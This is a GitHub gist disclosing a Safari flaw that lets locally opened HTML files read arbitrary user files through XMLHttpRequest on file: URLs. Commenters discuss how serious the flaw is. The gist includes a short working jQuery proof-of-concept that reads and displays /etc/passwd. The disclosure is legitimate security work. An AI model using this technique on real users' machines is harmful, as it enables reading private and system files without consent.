Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.
<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
$.ajax({url: '/etc/passwd'}).done(function (s) {
$('body').html('<pre>' + s + '</pre>');
});
</script>
Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.
UPDATE: Turns out this is a known problem:
https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format
@chesleybrown

This comment has been minimized.

Copy link

commented Mar 27, 2015

Ah, now that's not nearly as bad as I had originally thought. I was losing my mind there for a few minutes thinking "No way... no way is it that simple". lol

@rongarret

This comment has been minimized.

Copy link
Owner Author

commented Mar 27, 2015

I dunno, this seems pretty bad to me. Why do you think it's not?

@sandrogauci

This comment has been minimized.

Copy link

commented Mar 31, 2015

@rongarret I think @chesleybrown thought that the file could be hosted on a website and display local files. It needs to be opened locally for it to be able to read local files.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.